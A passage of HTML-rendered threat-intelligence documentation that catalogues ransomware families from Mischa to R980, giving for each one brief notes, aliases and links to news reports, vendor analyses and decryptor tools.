<p>Ransomware Based on HiddenTear</p>
</div>
</div>
<div class="sect2">
<h3 id="_mischa"><a class="anchor" href="#_mischa"></a><a class="link" href="#_mischa">Mischa</a></h3>
<div class="paragraph">
<p>Ransomware Packaged with Petya PDFBewerbungsmappe.exe</p>
</div>
<div class="paragraph">
<p>Mischa is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>"Petya&#8217;s little brother"</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2045. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/">http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mm_locker"><a class="anchor" href="#_mm_locker"></a><a class="link" href="#_mm_locker">MM Locker</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<div class="paragraph">
<p>MM Locker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Booyah</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2046. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered">https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mobef"><a class="anchor" href="#_mobef"></a><a class="link" href="#_mobef">Mobef</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Mobef is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Yakes</p>
</li>
<li>
<p>CryptoBit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2047. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/malware/Mobef.html">http://nyxbone.com/malware/Mobef.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/">http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nyxbone.com/images/articulos/malware/mobef/0.png">http://nyxbone.com/images/articulos/malware/mobef/0.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_monument"><a class="anchor" href="#_monument"></a><a class="link" href="#_monument">Monument</a></h3>
<div class="paragraph">
<p>Ransomware Use the DarkLocker 5 porn screenlocker - Jigsaw variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2048. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/844826339186135040">https://twitter.com/malwrhunterteam/status/844826339186135040</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_n_splitter"><a class="anchor" href="#_n_splitter"></a><a class="link" href="#_n_splitter">N-Splitter</a></h3>
<div class="paragraph">
<p>Ransomware Russian Koolova Variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2049. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/815961663644008448">https://twitter.com/JakubKroustek/status/815961663644008448</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=dAVMgX8Zti4&amp;feature=youtu.be&amp;list=UU_TMZYaLIgjsdJMwurHAi4Q">https://www.youtube.com/watch?v=dAVMgX8Zti4&amp;feature=youtu.be&amp;list=UU_TMZYaLIgjsdJMwurHAi4Q</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_n1n1n1"><a class="anchor" href="#_n1n1n1"></a><a class="link" href="#_n1n1n1">n1n1n1</a></h3>
<div class="paragraph">
<p>Ransomware Filemaker: "333333333333"</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2050. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/790608484303712256">https://twitter.com/demonslay335/status/790608484303712256</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/831891344897482754">https://twitter.com/demonslay335/status/831891344897482754</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nanolocker"><a class="anchor" href="#_nanolocker"></a><a class="link" href="#_nanolocker">NanoLocker</a></h3>
<div class="paragraph">
<p>Ransomware no extension change, has a GUI</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2051. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://github.com/Cyberclues/nanolocker-decryptor">http://github.com/Cyberclues/nanolocker-decryptor</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nemucod"><a class="anchor" href="#_nemucod"></a><a class="link" href="#_nemucod">Nemucod</a></h3>
<div class="paragraph">
<p>Ransomware 7zip (a0.exe) variant cannot be decrypted Encrypts the first 2048 Bytes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2052. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/nemucod">https://decrypter.emsisoft.com/nemucod</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/Antelox/NemucodFR">https://github.com/Antelox/NemucodFR</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/">http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cisecurity.org/malware-analysis-report-nemucod-ransomware/">https://blog.cisecurity.org/malware-analysis-report-nemucod-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netix"><a class="anchor" href="#_netix"></a><a class="link" href="#_netix">Netix</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Netix is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RANSOM_NETIX.A</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2053. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/">http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nhtnwcuf"><a class="anchor" href="#_nhtnwcuf"></a><a class="link" href="#_nhtnwcuf">Nhtnwcuf</a></h3>
<div class="paragraph">
<p>Ransomware Does not encrypt the files / Files are destroyed</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2054. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/demonslay335/status/839221457360195589">https://twitter.com/demonslay335/status/839221457360195589</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nmoreira"><a class="anchor" href="#_nmoreira"></a><a class="link" href="#_nmoreira">NMoreira</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>NMoreira is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XRatTeam</p>
</li>
<li>
<p>XPan</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2055. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/nmoreira">https://decrypter.emsisoft.com/nmoreira</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/fwosar/status/803682662481174528">https://twitter.com/fwosar/status/803682662481174528</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_noobcrypt"><a class="anchor" href="#_noobcrypt"></a><a class="link" href="#_noobcrypt">NoobCrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2056. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/757267550346641408">https://twitter.com/JakubKroustek/status/757267550346641408</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/noobcrypt-ransomware-dev-shows-noobness-by-using-same-password-for-everyone/">https://www.bleepingcomputer.com/news/security/noobcrypt-ransomware-dev-shows-noobness-by-using-same-password-for-everyone/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nuke"><a class="anchor" href="#_nuke"></a><a class="link" href="#_nuke">Nuke</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_nullbyte"><a class="anchor" href="#_nullbyte"></a><a class="link" href="#_nullbyte">Nullbyte</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2057. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/NullByteDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/NullByteDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-nullbyte-ransomware-pretends-to-be-the-necrobot-pokemon-go-application/">https://www.bleepingcomputer.com/news/security/the-nullbyte-ransomware-pretends-to-be-the-necrobot-pokemon-go-application/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_odcodc"><a class="anchor" href="#_odcodc"></a><a class="link" href="#_odcodc">ODCODC</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2058. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.bleepingcomputer.com/BloodDolly/ODCODCDecoder.zip">http://download.bleepingcomputer.com/BloodDolly/ODCODCDecoder.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/odcodc.html">http://www.nyxbone.com/malware/odcodc.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/813762510302183424">https://twitter.com/PolarToffee/status/813762510302183424</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/images/articulos/malware/odcodc/1c.png">http://www.nyxbone.com/images/articulos/malware/odcodc/1c.png</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_offline_ransomware"><a class="anchor" href="#_offline_ransomware"></a><a class="link" href="#_offline_ransomware">Offline ransomware</a></h3>
<div class="paragraph">
<p>Ransomware email addresses overlap with .777 addresses</p>
</div>
<div class="paragraph">
<p>Offline ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Vipasana</p>
</li>
<li>
<p>Cryakl</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2059. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/8547">https://support.kaspersky.com/viruses/disinfection/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://bartblaze.blogspot.com.co/2016/02/vipasana-ransomware-new-ransom-on-block.html">http://bartblaze.blogspot.com.co/2016/02/vipasana-ransomware-new-ransom-on-block.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_omg_ransomware"><a class="anchor" href="#_omg_ransomware"></a><a class="link" href="#_omg_ransomware">OMG! Ransomware</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>OMG! Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>GPCode</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_operation_global_iii"><a class="anchor" href="#_operation_global_iii"></a><a class="link" href="#_operation_global_iii">Operation Global III</a></h3>
<div class="paragraph">
<p>Ransomware Is a file infector (virus)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2060. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.thewindowsclub.com/operation-global-iii-ransomware-decryption-tool-released-70341/">http://news.thewindowsclub.com/operation-global-iii-ransomware-decryption-tool-released-70341/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_owl"><a class="anchor" href="#_owl"></a><a class="link" href="#_owl">Owl</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Owl is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CryptoWire</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2061. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/842342996775448576">https://twitter.com/JakubKroustek/status/842342996775448576</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_padcrypt"><a class="anchor" href="#_padcrypt"></a><a class="link" href="#_padcrypt">PadCrypt</a></h3>
<div class="paragraph">
<p>Ransomware has a live support chat</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2062. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/">http://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/798141978810732544">https://twitter.com/malwrhunterteam/status/798141978810732544</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_padlock_screenlocker"><a class="anchor" href="#_padlock_screenlocker"></a><a class="link" href="#_padlock_screenlocker">Padlock Screenlocker</a></h3>
<div class="paragraph">
<p>Ransomware Unlock code is: ajVr/G\ RJz0R</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2063. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/811635075158839296">https://twitter.com/BleepinComputer/status/811635075158839296</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_patcher"><a class="anchor" href="#_patcher"></a><a class="link" href="#_patcher">Patcher</a></h3>
<div class="paragraph">
<p>Ransomware Targeting macOS users</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2064. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/">https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-macos-patcher-ransomware-locks-data-for-good-no-way-to-recover-your-files/">https://www.bleepingcomputer.com/news/security/new-macos-patcher-ransomware-locks-data-for-good-no-way-to-recover-your-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_petya"><a class="anchor" href="#_petya"></a><a class="link" href="#_petya">Petya</a></h3>
<div class="paragraph">
<p>Ransomware encrypts disk partitions PDFBewerbungsmappe.exe</p>
</div>
<div class="paragraph">
<p>Petya is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Goldeneye</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2065. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator">http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=mSqxFjZq_z4">https://www.youtube.com/watch?v=mSqxFjZq_z4</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/threat-analysis/2016/04/petya-ransomware/">https://blog.malwarebytes.org/threat-analysis/2016/04/petya-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/">https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_philadelphia"><a class="anchor" href="#_philadelphia"></a><a class="link" href="#_philadelphia">Philadelphia</a></h3>
<div class="paragraph">
<p>Ransomware Coded by "The_Rainmaker"</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2066. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/philadelphia">https://decrypter.emsisoft.com/philadelphia</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/[www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pizzacrypts"><a class="anchor" href="#_pizzacrypts"></a><a class="link" href="#_pizzacrypts">PizzaCrypts</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2067. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.bleepingcomputer.com/BloodDolly/JuicyLemonDecoder.zip">http://download.bleepingcomputer.com/BloodDolly/JuicyLemonDecoder.zip</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pokemongo"><a class="anchor" href="#_pokemongo"></a><a class="link" href="#_pokemongo">PokemonGO</a></h3>
<div class="paragraph">
<p>Ransomware Based on Hidden Tear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2068. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/pokemonGO.html">http://www.nyxbone.com/malware/pokemonGO.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/pokemongo-ransomware-installs-backdoor-accounts-and-spreads-to-other-drives/">http://www.bleepingcomputer.com/news/security/pokemongo-ransomware-installs-backdoor-accounts-and-spreads-to-other-drives/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_polyglot"><a class="anchor" href="#_polyglot"></a><a class="link" href="#_polyglot">Polyglot</a></h3>
<div class="paragraph">
<p>Ransomware Immitates CTB-Locker</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2069. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/8547">https://support.kaspersky.com/8547</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/">https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerware"><a class="anchor" href="#_powerware"></a><a class="link" href="#_powerware">PowerWare</a></h3>
<div class="paragraph">
<p>Ransomware Open-sourced PowerShell</p>
</div>
<div class="paragraph">
<p>PowerWare is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PoshCoder</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2070. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py">https://github.com/pan-unit42/public_tools/blob/master/powerware/powerware_decrypt.py</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/PowerLockyDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/PowerLockyDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/">https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/">http://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powerworm"><a class="anchor" href="#_powerworm"></a><a class="link" href="#_powerworm">PowerWorm</a></h3>
<div class="paragraph">
<p>Ransomware no decryption possible, throws key away, destroys the files</p>
</div>
</div>
<div class="sect2">
<h3 id="_princess_locker"><a class="anchor" href="#_princess_locker"></a><a class="link" href="#_princess_locker">Princess Locker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2071. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/">https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/">https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/">https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prism"><a class="anchor" href="#_prism"></a><a class="link" href="#_prism">PRISM</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2072. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/">http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ps2exe"><a class="anchor" href="#_ps2exe"></a><a class="link" href="#_ps2exe">Ps2exe</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2073. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/803297700175286273">https://twitter.com/jiriatvirlab/status/803297700175286273</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_r"><a class="anchor" href="#_r"></a><a class="link" href="#_r">R</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2074. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/846705481741733892">https://twitter.com/malwrhunterteam/status/846705481741733892</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_r980"><a class="anchor" href="#_r980"></a><a class="link" href="#_r980">R980</a></h3>
<div class="paragraph">
